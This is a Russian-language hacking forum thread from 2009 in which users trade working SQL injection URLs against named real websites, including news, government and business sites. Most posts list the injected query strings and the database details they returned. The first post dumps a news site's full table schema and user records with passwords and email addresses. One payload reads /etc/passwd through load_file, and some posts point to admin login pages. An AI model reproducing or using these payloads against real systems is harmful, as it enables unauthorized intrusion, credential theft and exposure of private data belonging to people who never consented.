ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2009, 00:02
Аватар для F4R
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

САМАРА Сегодня

http://www.samaratoday.ru/news.php?id=-166793+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,0,1,2,3,4,5,6,7--

Database Version: 5.0.45
Database name: samaratoda_news
User name: samaratoda_news@localhost


Код:
16 :In database information_schema found table USER_PRIVILEGES
   1 :   GRANTEE
   2 :   TABLE_CATALOG
   3 :   PRIVILEGE_TYPE
   4 :   IS_GRANTABLE
17 :In database information_schema found table VIEWS
   1 :   TABLE_CATALOG
   2 :   TABLE_SCHEMA
   3 :   TABLE_NAME
   4 :   VIEW_DEFINITION
   5 :   CHECK_OPTION
   6 :   IS_UPDATABLE
   7 :   DEFINER
   8 :   SECURITY_TYPE
18 :In database samaratoda_news found table authors
   1 :   idAuthor
   2 :   nameAuthor
   3 :   orgNameAuthor
   4 :   emailAuthor
19 :In database samaratoda_news found table comment
   1 :   idComment
   2 :   idNewsComment
   3 :   dateComment
   4 :   nickComment
   5 :   textComment
   6 :   emailComment
   7 :   ipComment
20 :In database samaratoda_news found table confirm
   1 :   idConfirm
   2 :   dateExpirate
   3 :   random
   4 :   idUser
21 :In database samaratoda_news found table groups
   1 :   groupid
   2 :   groupname
22 :In database samaratoda_news found table grouptouser
   1 :   grouptouserid
   2 :   userid
   3 :   groupid
23 :In database samaratoda_news found table indexDayCache
   1 :   cacheIndex
   2 :   idNews
   3 :   dateNews
   4 :   headNews
24 :In database samaratoda_news found table links
   1 :   idLink
   2 :   nameLink
   3 :   urlLink
   4 :   idRubLink
   5 :   idTopicLink
   6 :   exportFlagLink
25 :In database samaratoda_news found table login_jour
   1 :   idLogin
   2 :   dateLogin
   3 :   ipLogin
   4 :   idUserLogin
26 :In database samaratoda_news found table mylog
   1 :   Id
   2 :   log_time
   3 :   logtext
27 :In database samaratoda_news found table news
   1 :   idNews
   2 :   dateNews
   3 :   idRubNews
   4 :   idAuthorNews
   5 :   idPhotographerNews
   6 :   headNews
   7 :   lidNews
   8 :   bodyNews
   9 :   sourceNews
   10 :   priorAttrNews
   11 :   urlSourceNews
   12 :   titleImgNews
   13 :   showAnnonceNews
   14 :   textAnnonceNews
   15 :   autoDayNews
   16 :   urlOrigNews
   17 :   urlCitNews
28 :In database samaratoda_news found table news2006
   1 :   idNews
   2 :   dateNews
   3 :   idRubNews
   4 :   idAuthorNews
   5 :   idPhotographerNews
   6 :   headNews
   7 :   lidNews
   8 :   bodyNews
   9 :   sourceNews
   10 :   priorAttrNews
   11 :   urlSourceNews
   12 :   titleImgNews
   13 :   showAnnonceNews
   14 :   textAnnonceNews
   15 :   autoDayNews
29 :In database samaratoda_news found table news_arch
   1 :   idNews
   2 :   dateNews
   3 :   idRubNews
   4 :   idAuthorNews
   5 :   idPhotographerNews
   6 :   headNews
   7 :   lidNews
   8 :   bodyNews
   9 :   sourceNews
   10 :   priorAttrNews
   11 :   urlSourceNews
   12 :   titleImgNews
   13 :   showAnnonceNews
   14 :   textAnnonceNews
   15 :   autoDayNews
   16 :   urlOrigNews
   17 :   urlCitNews
30 :In database samaratoda_news found table news_cache
   1 :   cacheIndex
   2 :   idNews
   3 :   dateNews
   4 :   idRubNews
   5 :   idAuthorNews
   6 :   idPhotographerNews
   7 :   headNews
   8 :   lidNews
   9 :   bodyNews
   10 :   sourceNews
   11 :   priorAttrNews
   12 :   urlSourceNews
   13 :   titleImgNews
   14 :   showAnnonceNews
   15 :   textAnnonceNews
   16 :   autoDayNews
31 :In database samaratoda_news found table news_log
   1 :   idLog
   2 :   idNews
   3 :   dateNews
   4 :   idRubNews
   5 :   idAuthorNews
   6 :   idPhotographerNews
   7 :   headNews
   8 :   lidNews
   9 :   bodyNews
   10 :   sourceNews
   11 :   priorAttrNews
   12 :   urlSourceNews
   13 :   titleImgNews
   14 :   showAnnonceNews
   15 :   textAnnonceNews
   16 :   autoDayNews
   17 :   userId
   18 :   date_zapros
   19 :   zapros
   20 :   urlOrigNews
   21 :   urlCitNews
32 :In database samaratoda_news found table news_topics
   1 :   idNews_Topic
   2 :   idNews
   3 :   idTopic
33 :In database samaratoda_news found table news_users
   1 :   idNews_User
   2 :   idNews
   3 :   idUser
34 :In database samaratoda_news found table photographers
   1 :   idPhotographer
   2 :   namePhotographer
   3 :   orgNamePhotographer
35 :In database samaratoda_news found table rubrics
   1 :   idRubric
   2 :   nameRubric
   3 :   lidRubric
   4 :   sortIdRubric
36 :In database samaratoda_news found table seqid
   1 :   idSeq
   2 :   dummy
37 :In database samaratoda_news found table seqid_t
   1 :   idSeq
   2 :   dummy
38 :In database samaratoda_news found table subscr_users
   1 :   userid
   2 :   username
   3 :   passwrd
   4 :   email
   5 :   firstname
   6 :   lastname
   7 :   middlename
   8 :   countryid
   9 :   state
   10 :   city
   11 :   zip
   12 :   address
   13 :   phone
   14 :   cellphone
   15 :   pgrphone
   16 :   pgrnumber
39 :In database samaratoda_news found table subscribe
   1 :   subscribeId
   2 :   created
   3 :   subscribeName
   4 :   subscribePeriod
   5 :   userId
   6 :   confirm
40 :In database samaratoda_news found table topics
   1 :   idTopic
   2 :   nameTopic
   3 :   actualAttrTopic
41 :In database samaratoda_news found table update_status
   1 :   id_update_status
   2 :   update_time
   3 :   update_finished
42 :In database samaratoda_news found table user_rubric
   1 :   idUser_rubric
   2 :   idUser
   3 :   idRubric
43 :In database samaratoda_news found table users
   1 :   userid
   2 :   username
   3 :   passwrd
   4 :   email
   5 :   firstname
   6 :   lastname
   7 :   middlename
   8 :   countryid
   9 :   state
   10 :   city
   11 :   zip
   12 :   address
   13 :   phone
   14 :   cellphone
   15 :   pgrphone
   16 :   pgrnumber

в табличку USERS тока 2 записи:
[1]:1:Светлана:111111:svgor@bk.ru
[2]:2:Alex:8e956352ad5b3a54076586b4f612b601:balex42@g mail.com

второй хэш не осилил)

Последний раз редактировалось jokester; 23.03.2009 в 00:32..
 
Ответить с цитированием

  #2  
Старый 23.03.2009, 00:39
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
user() : database() : version()
sherryml_genuser@localhost : sherryml_db : 5.0.45-community
 
Ответить с цитированием

  #3  
Старый 23.03.2009, 00:49
Аватар для ПаВлУшКа
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
Код:
http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20information_schema.tables--
 
Ответить с цитированием

  #4  
Старый 23.03.2009, 01:10
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
user() : database() : version()
mefgovkh_web@216.65.1.253 : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
 
Ответить с цитированием

  #5  
Старый 23.03.2009, 01:17
Аватар для Морок
Морок
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме:
10850

Репутация: 16
По умолчанию

http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(), version())--

Админка по адресу: http://www.passionforstone.eu/admin/login.php

В базе отсутствуют поля отвечающие за аутентификацию. Или разделение прав или прописано в файлах.
 
Ответить с цитированием

  #6  
Старый 23.03.2009, 01:39
Аватар для laedafess
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

Код:
http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
user(): Stamco02@stamco.mynewserver.com
database(): stamco
version(): 4.1.22
PR: 3
---------------------------------------------------
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7+--+
Код:
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
user(): b2becat@10.0.0.16
database(): Kincrome
version(): 5.0.56sp1-enterprise-gpl
PR: 4
---------------------------------------------------
Код:
http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*
user(): mirabilidb@localhost
database(): mirabili_it
version(): 4.0.24_Debian-10sarge3-log
PR: 4
 
Ответить с цитированием

  #7  
Старый 23.03.2009, 02:11
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*

Database Version: 4.1.20-log
Database name: tdevils_db
User name: tdevils@localhost
 
Ответить с цитированием

  #8  
Старый 23.03.2009, 03:29
Аватар для Морок
Морок
Новичок
Регистрация: 06.03.2009
Сообщений: 5
Провел на форуме:
10850

Репутация: 16
По умолчанию

http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4--

http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
 
Ответить с цитированием

  #9  
Старый 23.03.2009, 04:48
Аватар для M.W.N.N.
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1
version():5.0.67-community
database():vsmccom_datavsmc
user():vsmccom_sisoft@localhost
 
Ответить с цитированием

  #10  
Старый 23.03.2009, 15:32
Аватар для ПаВлУшКа
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
Код:
http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9--

Последний раз редактировалось jokester; 23.03.2009 в 18:18.. Причина: esqway165.com БОЯН
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ